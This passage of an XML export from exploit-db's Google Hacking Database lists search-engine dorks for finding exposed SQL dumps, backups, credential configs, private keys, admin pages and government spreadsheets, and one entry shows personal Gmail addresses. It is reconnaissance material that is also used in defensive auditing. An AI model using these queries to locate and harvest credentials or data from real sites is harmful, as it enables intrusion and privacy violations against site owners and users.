# Files Containing Juicy Info
# Date:10/10/2021
# Exploit Author: Red Blue Ops</textualDescription>
<query>inurl:/plugins/pie-register/</query>
<querystring>https://www.google.com/search?q=inurl:/plugins/pie-register/</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>3732</id>
<link>https://www.exploit-db.com/ghdb/3732</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/push/ .pem apns -&quot;push notifications&quot; &quot;bag attributes&quot;</shortDescription>
<textualDescription>iphone apple push notification system private keys, frequently unencrypted,
frequently with DeviceIDs in same dir</textualDescription>
<query>inurl:/push/ .pem apns -&quot;push notifications&quot; &quot;bag attributes&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/push/ .pem apns -&quot;push notifications&quot; &quot;bag attributes&quot;</querystring>
<edb></edb>
<date>2011-07-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4577</id>
<link>https://www.exploit-db.com/ghdb/4577</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/secure/attachment/ filetype:log OR filetype:txt</shortDescription>
<textualDescription>Files containing logs and bug reports of JIRA software development tool
Dheeraj
https://github.com/dheeraj-rn/</textualDescription>
<query>inurl:/secure/attachment/ filetype:log OR filetype:txt</query>
<querystring>https://www.google.com/search?q=inurl:/secure/attachment/ filetype:log OR filetype:txt</querystring>
<edb></edb>
<date>2017-09-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>7453</id>
<link>https://www.exploit-db.com/ghdb/7453</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/servicedesk/customer/user/signup</shortDescription>
<textualDescription># Google Dork: inurl:/servicedesk/customer/user/signup
# Files Containing Juicy Info
# Date:16/10/2021
# Exploit Author: Aman Rawat</textualDescription>
<query>inurl:/servicedesk/customer/user/signup</query>
<querystring>https://www.google.com/search?q=inurl:/servicedesk/customer/user/signup</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Aman Rawat</author>
</entry>
<entry>
<id>8028</id>
<link>https://www.exploit-db.com/ghdb/8028</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/sym404/root</shortDescription>
<textualDescription># Google Dork: inurl:/sym404/root
# Files Containing Juicy Info
# Date:18/08/2022
# Exploit Author: Numen Blog</textualDescription>
<query>inurl:/sym404/root</query>
<querystring>https://www.google.com/search?q=inurl:/sym404/root</querystring>
<edb></edb>
<date>2022-08-18</date>
<author>Numen Blog</author>
</entry>
<entry>
<id>4939</id>
<link>https://www.exploit-db.com/ghdb/4939</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/ai1wm-backups + wpress</shortDescription>
<textualDescription>inurl:/wp-content/ai1wm-backups + wpress
</textualDescription>
<query>inurl:/wp-content/ai1wm-backups + wpress</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/ai1wm-backups + wpress</querystring>
<edb></edb>
<date>2018-09-04</date>
<author>Hesam Bazvand</author>
</entry>
<entry>
<id>7468</id>
<link>https://www.exploit-db.com/ghdb/7468</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/plugins/elementor/</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/plugins/elementor/
# Files Containing Juicy Info
# Date:20/10/2021
# Exploit Author: samarth dad</textualDescription>
<query>inurl:/wp-content/plugins/elementor/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/elementor/</querystring>
<edb></edb>
<date>2021-10-20</date>
<author>samarth dad</author>
</entry>
<entry>
<id>7420</id>
<link>https://www.exploit-db.com/ghdb/7420</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/plugins/mstore-api/</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/plugins/mstore-api/
# Files Containing Juicy Info
# Date:10/10/2021
# Exploit Author: Red Blue Ops</textualDescription>
<query>inurl:/wp-content/plugins/mstore-api/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/mstore-api/</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>7497</id>
<link>https://www.exploit-db.com/ghdb/7497</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/plugins/simple-forum/admin/</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/plugins/simple-forum/admin/
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: Naïm Gallouj</textualDescription>
<query>inurl:/wp-content/plugins/simple-forum/admin/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/simple-forum/admin/</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Naïm Gallouj</author>
</entry>
<entry>
<id>7419</id>
<link>https://www.exploit-db.com/ghdb/7419</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/plugins/thecartpress/</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/plugins/thecartpress/
# Files Containing Juicy Info
# Date:10/10/2021
# Exploit Author: Red Blue Ops</textualDescription>
<query>inurl:/wp-content/plugins/thecartpress/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/thecartpress/</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>7344</id>
<link>https://www.exploit-db.com/ghdb/7344</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/plugins/wp-e-commerce</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/plugins/wp-e-commerce
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Sagar Jain</textualDescription>
<query>inurl:/wp-content/plugins/wp-e-commerce</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/wp-e-commerce</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Sagar Jain</author>
</entry>
<entry>
<id>7469</id>
<link>https://www.exploit-db.com/ghdb/7469</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/plugins/wp-filebase/</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/plugins/wp-filebase/
# Files Containing Juicy Info
# Date:20/10/2021
# Exploit Author: samarth dad</textualDescription>
<query>inurl:/wp-content/plugins/wp-filebase/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/wp-filebase/</querystring>
<edb></edb>
<date>2021-10-20</date>
<author>samarth dad</author>
</entry>
<entry>
<id>7340</id>
<link>https://www.exploit-db.com/ghdb/7340</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/themes/avada</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/themes/avada
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Sagar Jain</textualDescription>
<query>inurl:/wp-content/themes/avada</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/avada</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Sagar Jain</author>
</entry>
<entry>
<id>7311</id>
<link>https://www.exploit-db.com/ghdb/7311</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/themes/beach_apollo</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/themes/beach_apollo
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Sagar Jain</textualDescription>
<query>inurl:/wp-content/themes/beach_apollo</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/beach_apollo</querystring>
<edb></edb>
<date>2021-09-28</date>
<author>Sagar Jain</author>
</entry>
<entry>
<id>7341</id>
<link>https://www.exploit-db.com/ghdb/7341</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/themes/centum</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/themes/centum
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Sagar Jain</textualDescription>
<query>inurl:/wp-content/themes/centum</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/centum</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Sagar Jain</author>
</entry>
<entry>
<id>7343</id>
<link>https://www.exploit-db.com/ghdb/7343</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/themes/IncredibleWP</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/themes/IncredibleWP
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Sagar Jain</textualDescription>
<query>inurl:/wp-content/themes/IncredibleWP</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/IncredibleWP</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Sagar Jain</author>
</entry>
<entry>
<id>7339</id>
<link>https://www.exploit-db.com/ghdb/7339</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/themes/striking_r</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/themes/striking_r
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Sagar Jain</textualDescription>
<query>inurl:/wp-content/themes/striking_r</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/striking_r</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Sagar Jain</author>
</entry>
<entry>
<id>7342</id>
<link>https://www.exploit-db.com/ghdb/7342</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/themes/ultimatum</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/themes/ultimatum
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Sagar Jain</textualDescription>
<query>inurl:/wp-content/themes/ultimatum</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/ultimatum</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Sagar Jain</author>
</entry>
<entry>
<id>7003</id>
<link>https://www.exploit-db.com/ghdb/7003</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/uploads/ &quot;phpMyAdmin SQL Dump&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/uploads/ &quot;phpMyAdmin SQL Dump&quot;
# Files Containing Juicy Info
# Exploit Author: Robotshell
</textualDescription>
<query>inurl:/wp-content/uploads/ &quot;phpMyAdmin SQL Dump&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/ &quot;phpMyAdmin SQL Dump&quot;</querystring>
<edb></edb>
<date>2021-06-11</date>
<author>Robotshell</author>
</entry>
<entry>
<id>3906</id>
<link>https://www.exploit-db.com/ghdb/3906</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/uploads/ filetype:sql</shortDescription>
<textualDescription>Google dork for WordPress database backup file (sql):
inurl:/wp-content/uploads/ filetype:sql
By sm0k3 (http://sm0k3.net - Sm0k3 HQ)
_________________
With regards,
sm0k3
Any questions: info@sm0k3.net
Administration issues: admin@sm0k3.net
Want to submit an order: submit@sm0k3.net
Jabber: sm0k3@im.sm0k3.net
Blog: http://sm0k3.net</textualDescription>
<query>inurl:/wp-content/uploads/ filetype:sql</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/ filetype:sql</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>7004</id>
<link>https://www.exploit-db.com/ghdb/7004</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-content/uploads/wpdm-cache</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/uploads/wpdm-cache
# Files Containing Juicy Info
# Exploit Author: Aftab Alam
</textualDescription>
<query>inurl:/wp-content/uploads/wpdm-cache</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/wpdm-cache</querystring>
<edb></edb>
<date>2021-06-11</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>4944</id>
<link>https://www.exploit-db.com/ghdb/4944</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-json/wp/v2/users/ &quot;id&quot;:1,&quot;name&quot;:&quot; -wordpress.stackexchange.com -stackoverflow.com</shortDescription>
<textualDescription>Category: Vulnerable file
Misconfiguration attack to get information of wordpress users
ManhNho
</textualDescription>
<query>inurl:/wp-json/wp/v2/users/ &quot;id&quot;:1,&quot;name&quot;:&quot; -wordpress.stackexchange.com -stackoverflow.com</query>
<querystring>https://www.google.com/search?q=inurl:/wp-json/wp/v2/users/ &quot;id&quot;:1,&quot;name&quot;:&quot; -wordpress.stackexchange.com -stackoverflow.com</querystring>
<edb></edb>
<date>2018-09-11</date>
<author>ManhNho</author>
</entry>
<entry>
<id>8184</id>
<link>https://www.exploit-db.com/ghdb/8184</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/wp-login.php?action=register intext:&quot;Register For This Site&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/wp-login.php?action=register intext:&quot;Register For This Site&quot;
# Files Containing Juicy Info
# Date:16/05/2023
# Exploit Author: Puneet Saraswat</textualDescription>
<query>inurl:/wp-login.php?action=register intext:&quot;Register For This Site&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/wp-login.php?action=register intext:&quot;Register For This Site&quot;</querystring>
<edb></edb>
<date>2023-05-16</date>
<author>Puneet Saraswat</author>
</entry>
<entry>
<id>4956</id>
<link>https://www.exploit-db.com/ghdb/4956</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/yum.log | intitle:yum.log + ext:log</shortDescription>
<textualDescription>inurl:/yum.log | intitle:yum.log + ext:log
yum log files
ManhNho
</textualDescription>
<query>inurl:/yum.log | intitle:yum.log + ext:log</query>
<querystring>https://www.google.com/search?q=inurl:/yum.log | intitle:yum.log + ext:log</querystring>
<edb></edb>
<date>2018-09-17</date>
<author>ManhNho</author>
</entry>
<entry>
<id>7938</id>
<link>https://www.exploit-db.com/ghdb/7938</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/_layouts &quot;[To Parent Directory]&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/_layouts &quot;[To Parent Directory]&quot;
# Files Containing Juicy Info
# Date:17/06/2022
# Exploit Author: Zayed AlJaberi</textualDescription>
<query>inurl:/_layouts &quot;[To Parent Directory]&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/_layouts &quot;[To Parent Directory]&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Zayed AlJaberi</author>
</entry>
<entry>
<id>505</id>
<link>https://www.exploit-db.com/ghdb/505</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/_layouts/settings</shortDescription>
<textualDescription>With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/Loads of company info can be gained by an attacker when the URL's are unprotected. Furthermore unprotected sharepoint sites give full &quot;Edit, Add and Delete access&quot; to the information, which in case of malicious users may cause loss of important data.</textualDescription>
<query>inurl:/_layouts/settings</query>
<querystring>https://www.google.com/search?q=inurl:/_layouts/settings&amp;safe=off&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2004-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>7937</id>
<link>https://www.exploit-db.com/ghdb/7937</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/_vti_bin/ ext:asmx</shortDescription>
<textualDescription># Google Dork: inurl:/_vti_bin/ ext:asmx
# Files Containing Juicy Info
# Date:17/06/2022
# Exploit Author: Zayed AlJaberi</textualDescription>
<query>inurl:/_vti_bin/ ext:asmx</query>
<querystring>https://www.google.com/search?q=inurl:/_vti_bin/ ext:asmx</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Zayed AlJaberi</author>
</entry>
<entry>
<id>7282</id>
<link>https://www.exploit-db.com/ghdb/7282</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/_vti_bin/Authentication.asmx</shortDescription>
<textualDescription># Google Dork: inurl:/_vti_bin/Authentication.asmx
# Files Containing Juicy Info
# Date: 11/09/2021
# Exploit Author: Anmol K Sachan</textualDescription>
<query>inurl:/_vti_bin/Authentication.asmx</query>
<querystring>https://www.google.com/search?q=inurl:/_vti_bin/Authentication.asmx</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>5015</id>
<link>https://www.exploit-db.com/ghdb/5015</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/_vti_pvt/service.cnf | inurl:/_vti_inf.html | inurl:/_vti_bin/ | inurl:/_vti_bin/spsdisco.aspx</shortDescription>
<textualDescription># Google Dork: inurl:/_vti_pvt/service.cnf | inurl:/_vti_inf.html | inurl:/_vti_bin/ | inurl:/_vti_bin/spsdisco.aspx
# Description: Google Dork to find SharePoint version, FrontPage Configuration Information and SharePoint web services
# Date: 2018-11-07
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/</textualDescription>
<query>inurl:/_vti_pvt/service.cnf | inurl:/_vti_inf.html | inurl:/_vti_bin/ | inurl:/_vti_bin/spsdisco.aspx</query>
<querystring>https://www.google.com/search?q=inurl:/_vti_pvt/service.cnf | inurl:/_vti_inf.html | inurl:/_vti_bin/ | inurl:/_vti_bin/spsdisco.aspx</querystring>
<edb></edb>
<date>2018-11-07</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>4031</id>
<link>https://www.exploit-db.com/ghdb/4031</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:access.cnf ext:cnf</shortDescription>
<textualDescription>File vulnerability, reveals the path of Password Server. Have fun.
This Dork is present By Rootkit.</textualDescription>
<query>inurl:access.cnf ext:cnf</query>
<querystring>https://www.google.com/search?q=inurl:access.cnf ext:cnf</querystring>
<edb></edb>
<date>2015-07-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7643</id>
<link>https://www.exploit-db.com/ghdb/7643</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin ext:sql</shortDescription>
<textualDescription># Google Dork: inurl:admin ext:sql
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>inurl:admin ext:sql</query>
<querystring>https://www.google.com/search?q=inurl:admin ext:sql</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7820</id>
<link>https://www.exploit-db.com/ghdb/7820</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin filetype:txt</shortDescription>
<textualDescription># Google Dork: inurl:admin filetype:txt
# Files Containing Juicy Info
# Date: 16/11/2021
# Exploit Author: Saumyajeet Das</textualDescription>
<query>inurl:admin filetype:txt</query>
<querystring>https://www.google.com/search?q=inurl:admin filetype:txt</querystring>
<edb></edb>
<date>2021-11-17</date>
<author>Saumyajeet Das</author>
</entry>
<entry>
<id>127</id>
<link>https://www.exploit-db.com/ghdb/127</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin filetype:xls</shortDescription>
<textualDescription>This search can find Excel spreadsheets in an administrative directory or of an administrative nature. Many times these documents contain sensitive information.</textualDescription>
<query>inurl:admin filetype:xls</query>
<querystring>https://www.google.com/search?q=inurl%3Aadmin+filetype%3Axls&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>7832</id>
<link>https://www.exploit-db.com/ghdb/7832</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin filetype:xls</shortDescription>
<textualDescription># Google Dork: inurl:admin filetype:xls
# Files Containing Juicy Info
# Date:18/11/2021
# Exploit Author: Ritwick Dadhich</textualDescription>
<query>inurl:admin filetype:xls</query>
<querystring>https://www.google.com/search?q=inurl:admin filetype:xls</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Ritwick Dadhich</author>
</entry>
<entry>
<id>7823</id>
<link>https://www.exploit-db.com/ghdb/7823</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin filetype:xls site:gov.in</shortDescription>
<textualDescription># Google Dork: inurl:admin filetype:xls site:gov.in
# Files Containing Juicy Info
# Date: 17/11/2021
# Exploit Author: Saumyajeet Das</textualDescription>
<query>inurl:admin filetype:xls site:gov.in</query>
<querystring>https://www.google.com/search?q=inurl:admin filetype:xls site:gov.in</querystring>
<edb></edb>
<date>2021-11-17</date>
<author>Saumyajeet Das</author>
</entry>
<entry>
<id>7829</id>
<link>https://www.exploit-db.com/ghdb/7829</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin filetype:xlsx site:gov.*</shortDescription>
<textualDescription># Google Dork: inurl:admin filetype:xlsx site:gov.*
# Files Containing Juicy Info
# Date: 17/11/2021
# Exploit Author: Krishna Agarwal
</textualDescription>
<query>inurl:admin filetype:xlsx site:gov.*</query>
<querystring>https://www.google.com/search?q=inurl:admin filetype:xlsx site:gov.*</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>3824</id>
<link>https://www.exploit-db.com/ghdb/3824</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls</shortDescription>
<textualDescription>--
nitish mehta</textualDescription>
<query>inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls</query>
<querystring>https://www.google.com/search?q=inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls</querystring>
<edb></edb>
<date>2012-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>6239</id>
<link>https://www.exploit-db.com/ghdb/6239</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin intitle:index of ext:sql | xls | xml | json | csv</shortDescription>
<textualDescription># Title: Sensitive Data Exposure
# Google Dork: inurl:admin intitle:index of ext:sql | xls | xml | json | csv
# Date: 2020-06-06
# Author: Bhaskar Kumar
# LinkedIn: https://www.linkedin.com/in/haxonic/
_
Regards,
Team HAXONIC
</textualDescription>
<query>inurl:admin intitle:index of ext:sql | xls | xml | json | csv</query>
<querystring>https://www.google.com/search?q=inurl:admin intitle:index of ext:sql | xls | xml | json | csv</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Bhaskar Kumar</author>
</entry>
<entry>
<id>123</id>
<link>https://www.exploit-db.com/ghdb/123</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:admin intitle:login</shortDescription>
<textualDescription>This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information.</textualDescription>
<query>inurl:admin intitle:login</query>
<querystring>https://www.google.com/search?q=inurl%3Aadmin+intitle%3Alogin</querystring>
<edb></edb>
<date>2004-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6024</id>
<link>https://www.exploit-db.com/ghdb/6024</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=</shortDescription>
<textualDescription>Dork:
inurl:administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
Description: This Google dork lists out config details for a administrator
components of a web-server.
Author: Abhi Chitkara
</textualDescription>
<query>inurl:administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=</query>
<querystring>https://www.google.com/search?q=inurl:administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8333</id>
<link>https://www.exploit-db.com/ghdb/8333</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:adminpanel site:*.* -site:github.com</shortDescription>
<textualDescription># Google Dork: inurl:adminpanel site:*.* -site:github.com
# Files Containing Juicy Info
# Date: 08/11/2023
# Exploit Author: Anas Zakir
</textualDescription>
<query>inurl:adminpanel site:*.* -site:github.com</query>
<querystring>https://www.google.com/search?q=inurl:adminpanel site:*.* -site:github.com</querystring>
<edb></edb>
<date>2023-11-08</date>
<author>Anas Zakir</author>
</entry>
<entry>
<id>6999</id>
<link>https://www.exploit-db.com/ghdb/6999</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:ALFA_DATA intitle:&quot;index of&quot;</shortDescription>
<textualDescription># Google Dork: inurl:ALFA_DATA intitle:&quot;index of&quot;
# Files Containing Juicy Info.
# Date: 08/06/2021
# Exploit Author: Snowglobe_io
</textualDescription>
<query>inurl:ALFA_DATA intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=inurl:ALFA_DATA intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2021-06-09</date>
<author>Snowglobe_io</author>
</entry>
<entry>
<id>4526</id>
<link>https://www.exploit-db.com/ghdb/4526</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:app/config/ intext:parameters.yml intitle:index.of</shortDescription>
<textualDescription>Category: Files Containing Passwords
Query: inurl:app/config/ intext:parameters.yml intitle:index.of
Target: Symfony (PHP Framework)
Contains:
- database &amp; e-mail credentials
- secret
</textualDescription>
<query>inurl:app/config/ intext:parameters.yml intitle:index.of</query>
<querystring>https://www.google.com/search?q=inurl:app/config/ intext:parameters.yml intitle:index.of</querystring>
<edb></edb>
<date>2017-06-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>3686</id>
<link>https://www.exploit-db.com/ghdb/3686</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:app/etc/local.xml</shortDescription>
<textualDescription>Magento local.xml sensitive information disclosure
Author: Rambaud Pierre</textualDescription>
<query>inurl:app/etc/local.xml</query>
<querystring>https://www.google.com/search?q=inurl:app/etc/local.xml</querystring>
<edb></edb>
<date>2011-02-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5074</id>
<link>https://www.exploit-db.com/ghdb/5074</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:apspassword</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP Crystal report access ++
inurl:apspassword
- open SAP crystal databases to browse
- Possible SQL Injection
- Sensitive information
- Possible Cross-Site Scripting
- https://www.exploit-db.com/exploits/32882
- Possible Directory Traversal
- https://www.exploit-db.com/exploits/16054
- 48 results at the time of writing
DISCLAIMER:
(The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system)
Credit goes to the boys of Rapid7
</textualDescription>
<query>inurl:apspassword</query>
<querystring>https://www.google.com/search?q=inurl:apspassword</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>7324</id>
<link>https://www.exploit-db.com/ghdb/7324</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:autodiscover/autodiscover.xml</shortDescription>
<textualDescription># Google Dork: inurl:autodiscover/autodiscover.xml
# Files Containing Juicy Info
# Date:24/09/2021
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:autodiscover/autodiscover.xml</query>
<querystring>https://www.google.com/search?q=inurl:autodiscover/autodiscover.xml</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>374</id>
<link>https://www.exploit-db.com/ghdb/374</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:backup filetype:mdb</shortDescription>
<textualDescription>Microsoft Access database backups..</textualDescription>
<query>inurl:backup filetype:mdb</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3Abackup+filetype%3Amdb</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>8081</id>
<link>https://www.exploit-db.com/ghdb/8081</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:backup filetype:sql</shortDescription>
<textualDescription># Google Dork: inurl:backup filetype:sql
# Files Containing Juicy Info
# Date:22/02/2023
# Exploit Author: Nox Mentor</textualDescription>
<query>inurl:backup filetype:sql</query>
<querystring>https://www.google.com/search?q=inurl:backup filetype:sql</querystring>
<edb></edb>
<date>2023-02-22</date>
<author>Nox Mentor</author>
</entry>
<entry>
<id>1251</id>
<link>https://www.exploit-db.com/ghdb/1251</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:build.err</shortDescription>
<textualDescription>General build error file. Can tell what modules are installed, the OS the compiler the language, in theory usernames and passwords could probably be found too.</textualDescription>
<query>inurl:build.err</query>
<querystring>https://www.google.com/search?q=inurl%3Abuild.err+&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2006-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>7687</id>
<link>https://www.exploit-db.com/ghdb/7687</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:cache/uploads</shortDescription>
<textualDescription># Google Dork: inurl:cache/uploads
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>inurl:cache/uploads</query>
<querystring>https://www.google.com/search?q=inurl:cache/uploads</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>4345</id>
<link>https://www.exploit-db.com/ghdb/4345</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:calendar.google.com/calendar/embed?src=</shortDescription>
<textualDescription>This will bring up publicly available Google Calendars. For example, using
this dork you can find:
- https://calendar.google.com/calendar/embed?src=safekprocess@gmail.com
- https://calendar.google.com/calendar/embed?src=chris.hm.chan@gmail.com
- https://calendar.google.com/calendar/embed?src=kchan9@gmail.com</textualDescription>
<query>inurl:calendar.google.com/calendar/embed?src=</query>
<querystring>https://www.google.com/search?q=inurl:calendar.google.com/calendar/embed?src=</querystring>
<edb></edb>
<date>2016-10-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5819</id>
<link>https://www.exploit-db.com/ghdb/5819</link>
<category>Files Containing Juicy Info</category>
